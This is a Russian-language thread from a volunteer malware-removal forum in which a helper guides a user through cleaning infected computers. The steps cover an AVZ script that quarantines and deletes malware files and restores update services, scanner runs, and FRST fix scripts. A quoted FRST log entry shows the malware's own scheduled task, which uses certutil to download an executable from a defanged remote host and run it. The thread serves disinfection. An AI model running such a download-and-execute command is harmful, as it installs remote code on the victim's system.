Здравствуйте
компьютер заражен вирусами, сканирование разными антивирусными сканерами не помогает
прошу вас помочь
Printable View
Здравствуйте
компьютер заражен вирусами, сканирование разными антивирусными сканерами не помогает
прошу вас помочь
Уважаемый(ая) [B]i--l--g--i--z[/B], спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Здравствуйте!
Вы собрали логи устаревшей версией (с зеркала). Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по [url=http://virusinfo.info/soft/tool.php?tool=AutoLogger]ссылке[/url] из правил) и повторите CollectionLog.
[QUOTE=Sandor;1507332]Здравствуйте!
Вы собрали логи устаревшей версией (с зеркала). Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по [url=http://virusinfo.info/soft/tool.php?tool=AutoLogger]ссылке[/url] из правил) и повторите CollectionLog.[/QUOTE][ATTACH=CONFIG]680242[/ATTACH]
отчет во вложении
Через Панель управления - Удаление программ - удалите нежелательное ПО:
[quote]
CloudNet
[/quote]
[URL="http://virusinfo.info/showthread.php?t=130828"][b]Временно[/b] отключите защитное ПО[/URL].
[URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/URL]:
[CODE]{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями Virusnet.info
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;
ImagePathStr, RootStr, SubRootStr, LangID: string;
AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
FinishMsg, RestoreMsg, FixMsg, CheckMsg: String;
RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;
procedure CheckAndRestoreSection(Root: String);
begin
Inc(AllRoots);
if RegKeyExistsEx('HKLM', Root) then
RegKeyResetSecurity('HKLM', Root)
else
begin
Inc(RootsRestored);
RegKeyCreate('HKLM', Root);
AddToLog(RegSectMsg + Root + RestMsg);
end;
end;
procedure CheckAndRestoreSubSection;
begin
CheckAndRestoreSection(SubRootStr);
end;
procedure RestoredMsg(Root, Param: String);
begin
AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
Inc(KeysRestored);
end;
procedure FixedMsg(Root, Param: String);
begin
AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
Inc(KeysFixed);
end;
procedure RestoreStrParam(Root, Param, Value: String);
begin
RegKeyStrParamWrite('HKLM', Root, Param, Value);
RestoredMsg(Root, Param);
end;
procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', Root, Param) then
RestoreStrParam(Root, Param, Value);
end;
procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', Root, Param) then
begin
RegKeyIntParamWrite('HKLM', Root, Param, Value);
RestoredMsg(Root, Param);
end;
end;
procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', RootStr, Param) then
begin
ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
RestoredMsg(RootStr, Param);
end;
end;
// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
if RegKeyExistsEx('HKLM', RegStr) then
begin
Inc(AllKeys);
RegKeyResetSecurity('HKLM', RegStr);
RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
FixedMsg(RegStr, 'ImagePath');
end;
end;
{ Выполнение исправление всех ключей в ветках -
'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
i : integer;
begin
if Srv = 'BITS' then
FileServiceDll := FullPathSystem32 + 'qmgr.dll'
else
FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;
CheckAndRestoreSection(RootStr);
CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');
Inc(AllKeys);
if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
else
begin
Dec(AllKeys);
if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
for i:= 0 to 999 do
begin
if i > 0 then
CCSNumber := FormatFloat('ControlSet000', i)
else
CCSNumber := 'CurrentControlSet';
ImagePathFix(CCSNumber, Srv);
end;
end;
CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
CheckAndRestoreIntParam(RootStr, 'Start', 2);
CheckAndRestoreIntParam(RootStr, 'Type', 32);
if Srv = 'BITS' then
begin
CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
end;
SubRootStr:= RootStr + '\Enum';
CheckAndRestoreSubSection;
CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);
SubRootStr := RootStr + '\Security';
CheckAndRestoreSubSection;
Inc(AllKeys);
if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
begin
RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
RestoredMsg(SubRootStr, 'Security');
end;
SubRootStr:= RootStr + '\Parameters';
CheckAndRestoreSubSection;
Inc(AllKeys);
if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
begin
RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
RestoredMsg(SubRootStr, 'ServiceDll');
end
else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
begin
RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
FixedMsg(SubRootStr, 'ServiceDll');
end
end;
{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
TerminateProcessByName('c:\windows\rss\csrss.exe');
TerminateProcessByName('c:\windows\windefender.exe');
StopService('4F959A7FC8138071');
StopService('WinDefender');
StopService('Winmon');
StopService('WinmonFS');
StopService('WinmonProcessMonitor');
QuarantineFile('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '');
QuarantineFile('C:\Users\Baza\appdata\local\temp\csrss\cloudnet.exe', '');
QuarantineFile('C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe', '');
QuarantineFile('C:\Users\Baza\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '');
QuarantineFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtHgNeMqRB.url', '');
QuarantineFile('c:\windows\rss\csrss.exe', '');
QuarantineFile('C:\Windows\System32\drivers\Winmon.sys', '');
QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys', '');
QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '');
QuarantineFile('C:\Windows\TEMP\4DDAE01.sys', '');
QuarantineFile('c:\windows\windefender.exe', '');
DeleteFile('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '32');
DeleteFile('C:\Users\Baza\appdata\local\temp\csrss\cloudnet.exe', '');
DeleteFile('C:\Users\Baza\appdata\local\temp\csrss\scheduled.exe', '');
DeleteFile('C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe', '32');
DeleteFile('C:\Users\Baza\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '');
DeleteFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '32');
DeleteFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtHgNeMqRB.url', '32');
DeleteFile('c:\windows\rss\csrss.exe', '');
DeleteFile('C:\Windows\rss\csrss.exe', '32');
DeleteFile('C:\Windows\System32\drivers\Winmon.sys', '32');
DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys', '32');
DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '32');
DeleteFile('C:\Windows\TEMP\4DDAE01.sys', '32');
DeleteFile('c:\windows\windefender.exe', '32');
DeleteService('WinDefender');
DeleteService('Winmon');
DeleteService('WinmonFS');
DeleteService('WinmonProcessMonitor');
ClearLog;
ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage');
if LangID = '0419' then
begin
DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
DispayNameTextWuauServ := 'Автоматическое обновление';
DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
AddToLog('Операционная система - русская');
FinishMsg := '–––– Восстановление завершено ––––';
RestoreMsg := 'Восстановлено разделов\параметров: ';
FixMsg := 'Исправлено параметров: ';
CheckMsg := 'Проверено разделов\параметров: ';
RegSectMsg := 'Раздел реестра HKLM\';
ParamMsg := 'Параметр ';
ParamValueMsg := 'Значение параметра ';
InRegSectMsg := ' в разделе реестра HKLM\';
CorrectMsg := ' исправлено на оригинальное.';
RestMsg := ' восстановлен.';
end
else if LangID = '0409' then
begin
DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
DispayNameTextWuauServ := 'Automatic Updates';
DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
DispayNameTextBITS := 'Background Intelligent Transfer Service';
AddToLog('Operation system - english');
FinishMsg := '–––– Restoration finished ––––';
RestoreMsg := 'Sections\parameters restored: ';
FixMsg := 'Parameters corrected: ';
CheckMsg := 'Sections\parameters checked: ';
RegSectMsg := 'Registry section HKLM\';
ParamMsg := 'Parameter ';
ParamValueMsg := 'Value of parameter ';
InRegSectMsg := ' in registry section HKLM\';
CorrectMsg := ' corrected on original.';
RestMsg := ' restored.';
end;
AddToLog('');
{ Определение папки X:\Windows\System32\ }
NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
AllRoots := 0;
AllKeys := 0;
RootsRestored := 0;
KeysRestored := 0;
KeysFixed := 0;
CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');
AddToLog('');
AddToLog(FinishMsg);
AddToLog('');
AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
AddToLog(FixMsg + IntToStr(KeysFixed));
AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
DeleteSchedulerTask('csrss');
DeleteSchedulerTask('ScheduledUpdate');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^DOC001.exe', '32');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Baza^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DOC001.exe', '32');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Baza^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^LtHgNeMqRB.url', '32');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','QuietDew', '32');
DeleteService('4F959A7FC8138071');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]
Компьютер [U]перезагрузится[/U].
После перезагрузки, выполните такой скрипт:
[CODE]begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.[/CODE]
Файл [B]quarantine.zip[/B] из папки AVZ загрузите по ссылке "[B][COLOR="Red"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
После выполнения скрипта на рабочем столе появится текстовый файл [B]Correct_wuauserv&BITS.log[/B]. Его необходимо прикрепить к следующему сообщению.
Сделайте повторные логи по [URL="http://virusinfo.info/pravila.html"]правилам[/URL]. ([COLOR="RoyalBlue"]CollectionLog[/COLOR])
выполнил все инструкции
файлы во вложении
Пролечите систему с [url=https://support.kaspersky.ru/viruses/kvrt2015]помощью KVRT[/url], папку C:\KVRT\reports упакуйте в архив и прикрепите к следующему сообщению.
После этого соберите свежий CollectionLog.
Файлы выше
Уже лучше, но еще не все.
[LIST][*]Скачайте [B][URL="https://toolslib.net/downloads/viewdownload/1-adwcleaner/"]AdwCleaner (by Malwarebytes)[/URL][/B] и сохраните его на [B]Рабочем столе[/B].[*]Запустите его (необходимо запускать через правую кн. мыши [B]от имени администратора[/B]), нажмите кнопку [B]"Scan"[/B] ([B]"Сканировать"[/B]) и дождитесь окончания сканирования.[*]Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: [B][COLOR="Blue"]C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt[/COLOR][/B] (где x - любая цифра).[*]Прикрепите отчет к своему следующему сообщению.[/LIST]
[QUOTE=Sandor;1507347]Уже лучше, но еще не все.
[LIST][*]Скачайте [B][URL="https://toolslib.net/downloads/viewdownload/1-adwcleaner/"]AdwCleaner (by Malwarebytes)[/URL][/B] и сохраните его на [B]Рабочем столе[/B].[*]Запустите его (необходимо запускать через правую кн. мыши [B]от имени администратора[/B]), нажмите кнопку [B]"Scan"[/B] ([B]"Сканировать"[/B]) и дождитесь окончания сканирования.[*]Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: [B][COLOR=Blue]C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt[/COLOR][/B] (где x - любая цифра).[*]Прикрепите отчет к своему следующему сообщению.[/LIST]
[/QUOTE]
выполнил сканирование [B][URL="https://toolslib.net/downloads/viewdownload/1-adwcleaner/"]AdwCleaner[/URL][/B]
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
[QUOTE=i--l--g--i--z;1507363]выполнил сканирование [B][URL="https://toolslib.net/downloads/viewdownload/1-adwcleaner/"]AdwCleaner[/URL][/B][/QUOTE]
Здравствуйте, все эти действия не помогли
дистрибутив антивирусной защиты не устанавливается.
обновление windows не включается
Мы ещё не закончили.
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] (или с [url=http://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/]зеркала[/url]) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку [B]Scan[/B].
После окончания сканирования будут созданы отчеты [B]FRST.txt[/B] и [B]Addition.txt[/B] в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
[QUOTE=Sandor;1507366]Мы ещё не закончили.
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] (или с [URL="http://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL]) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку [B]Scan[/B].
После окончания сканирования будут созданы отчеты [B]FRST.txt[/B] и [B]Addition.txt[/B] в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.[/QUOTE]
Прикрепил отчеты к сообщению
[List][*] Отключите до перезагрузки антивирус.[*] Выделите следующий код:
[code]Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-3936912291-2935142151-2983686668-1000\...\MountPoints2: {1f717c32-b8d8-11e5-9749-002522d5b574} - G:\LGAutoRun.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Task: {1D75C3E5-CC23-46BB-8238-2D6C642696B0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {B0AD56F5-1883-42A2-97D4-62BCB5D05EC6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4016640 2019-12-20] () [File not signed] <==== ATTENTION
Toolbar: HKU\S-1-5-21-3936912291-2935142151-2983686668-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} - No File
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
2019-12-20 09:21 - 2019-12-20 09:21 - 000000000 ____D C:\Users\Baza\AppData\Roaming\EpicNet Inc
2019-12-20 09:20 - 2019-12-20 12:01 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-12-20 09:20 - 2019-12-20 12:01 - 000003172 _____ C:\Windows\system32\Tasks\csrss
FirewallRules: [{217BD779-6FAC-4712-A07B-026FE1DFDDB8}] => (Allow) C:\Users\Baza\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
FirewallRules: [{BE8CB9D6-9B44-4FC6-9A06-EB69D80F0A7A}] => (Allow) C:\Program Files\DriverPack Cloud\cloud.exe No File
FirewallRules: [{0713AA24-E86E-4D88-BAA8-C5E311B5AFE5}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{7DA884E6-275B-4A63-88F8-6A91C4B37605}] => (Allow) C:\Users\Baza\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
EmptyTemp:
Reboot:
End::[/code]
[*] Скопируйте выделенный текст (правой кнопкой - Копировать).[*] Запустите FRST (FRST64) от имени администратора.[*] Нажмите [B]Fix[/B] один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.[/List]
Компьютер будет перезагружен автоматически.
[QUOTE=Sandor;1507368]
[LIST][*] Отключите до перезагрузки антивирус.[*] Выделите следующий код:
[code]Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-3936912291-2935142151-2983686668-1000\...\MountPoints2: {1f717c32-b8d8-11e5-9749-002522d5b574} - G:\LGAutoRun.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Task: {1D75C3E5-CC23-46BB-8238-2D6C642696B0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {B0AD56F5-1883-42A2-97D4-62BCB5D05EC6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4016640 2019-12-20] () [File not signed] <==== ATTENTION
Toolbar: HKU\S-1-5-21-3936912291-2935142151-2983686668-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} - No File
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
2019-12-20 09:21 - 2019-12-20 09:21 - 000000000 ____D C:\Users\Baza\AppData\Roaming\EpicNet Inc
2019-12-20 09:20 - 2019-12-20 12:01 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-12-20 09:20 - 2019-12-20 12:01 - 000003172 _____ C:\Windows\system32\Tasks\csrss
FirewallRules: [{217BD779-6FAC-4712-A07B-026FE1DFDDB8}] => (Allow) C:\Users\Baza\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
FirewallRules: [{BE8CB9D6-9B44-4FC6-9A06-EB69D80F0A7A}] => (Allow) C:\Program Files\DriverPack Cloud\cloud.exe No File
FirewallRules: [{0713AA24-E86E-4D88-BAA8-C5E311B5AFE5}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{7DA884E6-275B-4A63-88F8-6A91C4B37605}] => (Allow) C:\Users\Baza\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
EmptyTemp:
Reboot:
End::[/code][*] Скопируйте выделенный текст (правой кнопкой - Копировать).[*] Запустите FRST (FRST64) от имени администратора.[*] Нажмите [B]Fix[/B] один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.[/LIST]
Компьютер будет перезагружен автоматически.[/QUOTE]
лог прикрепил
[quote="i--l--g--i--z;1507369"]Антивирусный дистрибутив не устанавливается[/quote]
Что вы под этим подразумеваете?
Какой-то антивирус пытаетесь установить и не получается?
[QUOTE=Sandor;1507371]Что вы под этим подразумеваете?
Какой-то антивирус пытаетесь установить и не получается?[/QUOTE]
да не получается установить антивирус eset avremover_ees_nt32_rus, доходит но копирования файлов и прерывается
хочу установить обновления windows не устанавливается
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
да не устанавливается eset avremover_ees_nt32_rus
не устанавливается обновление windows
в списке службы нет службы обновление
это наблюдается на всех зараженных компьютерах
[quote="i--l--g--i--z;1507372"]да не устанавливается eset avremover_ees_nt32_rus[/quote]
Что именно вы пытаетесь установить? Антивирус Eset? Или запустить утилиту очистки антивирусов?
В этой системе установлен антивирус Dr.Web Security Space и другие антивирусы устанавливать не нужно. Достаточно одного.
По службе обновлений - это в другой раздел, т.к. здесь производится именно лечение от вредоносных программ.
у меня корпоративная лицензия на Антивирус Eset, пытаюсь установить eset, Dr.Web Security Space в дальнейшем будет удален
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
кстати CloudNet снова себя установил, самостоятельно
Соберите свежий CollectionLog Автологером.
+
[LIST][*]Загрузите [B][URL=https://yadi.sk/d/xIUtpEqJq4wru]SecurityCheck by glax24 & Severnyj[/URL][/B], сохраните утилиту на [I]Рабочем столе[/I] и извлеките из архива.[*]Запустите двойным щелчком мыши (если Вы используете [I]Windows XP[/I]) или из меню по щелчку правой кнопки мыши [I]Запустить от имени администратора[/I] (если Вы используете [I]Windows Vista/7/8/8.1/10[/I])[*]Если увидите [U]предупреждение от вашего фаервола или SmartScreen[/U] относительно программы SecurityCheck, не блокируйте ее работу[*]Дождитесь окончания сканирования, откроется лог в блокноте с именем [B]SecurityCheck.txt[/B][*]Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем [I]SecurityCheck[/I], например [I][COLOR="Blue"]C:\SecurityCheck\SecurityCheck.txt[/COLOR][/I][*]Прикрепите этот файл к своему следующему сообщению.[/LIST]
файлы во вложении
1. Закройте общие ресурсы (или задайте для них пароль):
[QUOTE]
C:\
C:\DB_Tolebi
E:\Documents
C:\Users
[/QUOTE]
2. Исправьте:
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 [color=red][b]Внимание! [url=http://windows.microsoft.com/ru-ru/internet-explorer/ie-11-worldwide-languages]Скачать обновления[/url][/b][/color]
[color=blue][b]^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^[/b][/color]
[color=red][b]Контроль учётных записей пользователя [b]отключен[/b] (Уровень 1)[/b][/color]
[color=blue][b]^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^[/b][/color]
--------------------------- [ OtherUtilities ] ----------------------------
WinRAR 5.00 (32-разрядная) v.5.00.0 [color=red][b]Внимание! [url=http://www.rarlab.com/download.htm]Скачать обновления[/url][/b][/color]
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 11 ActiveX & Plugin 32-bit v.11.8.800.168 [color=red][b]Внимание! [url=http://download.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ax.exe]Скачать обновления[/url][/b][/color]
[color=blue][b]^[b][url=https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html]Удалите старую версию[/url][/b] и установите новые Flash Player ActiveX и Flash Player Plugin^[/b][/color]
Adobe Shockwave Player + Authorware Web Player v.v12.0.4.144 [color=red][b]Данная программа больше не поддерживается разработчиком.[/b][/color] Рекомендуется деинсталлировать ее, скачать и установить [b][url=http://get.adobe.com/shockwave/]Adobe Shockwave Player[/url][/b].
3.
[url=http://virusinfo.info/showthread.php?t=121767][b]Сделайте полный образ автозапуска uVS[/b][/url], только программу скачайте [url=https://yadi.sk/d/6A65LkI1WEuqC]отсюда[/url]
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Утилиту SecurityCheck вы скачивали по ссылке, которую я дал или она у вас уже была?
И если по моей ссылке, интернет при её работе вероятно был отключен, верно?
[QUOTE=Sandor;1507382]1. Закройте общие ресурсы (или задайте для них пароль):
2. Исправьте:
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 [COLOR=red][B]Внимание! [URL="http://windows.microsoft.com/ru-ru/internet-explorer/ie-11-worldwide-languages"]Скачать обновления[/URL][/B][/COLOR]
[COLOR=blue][B]^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^[/B][/COLOR]
[COLOR=red][B]Контроль учётных записей пользователя [B]отключен[/B] (Уровень 1)[/B][/COLOR]
[COLOR=blue][B]^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^[/B][/COLOR]
--------------------------- [ OtherUtilities ] ----------------------------
WinRAR 5.00 (32-разрядная) v.5.00.0 [COLOR=red][B]Внимание! [URL="http://www.rarlab.com/download.htm"]Скачать обновления[/URL][/B][/COLOR]
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 11 ActiveX & Plugin 32-bit v.11.8.800.168 [COLOR=red][B]Внимание! [URL="http://download.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ax.exe"]Скачать обновления[/URL][/B][/COLOR]
[COLOR=blue][B]^[B][URL="https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html"]Удалите старую версию[/URL][/B] и установите новые Flash Player ActiveX и Flash Player Plugin^[/B][/COLOR]
Adobe Shockwave Player + Authorware Web Player v.v12.0.4.144 [COLOR=red][B]Данная программа больше не поддерживается разработчиком.[/B][/COLOR] Рекомендуется деинсталлировать ее, скачать и установить [B][URL="http://get.adobe.com/shockwave/"]Adobe Shockwave Player[/URL][/B].
3.
[URL="http://virusinfo.info/showthread.php?t=121767"][B]Сделайте полный образ автозапуска uVS[/B][/URL], только программу скачайте [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL]
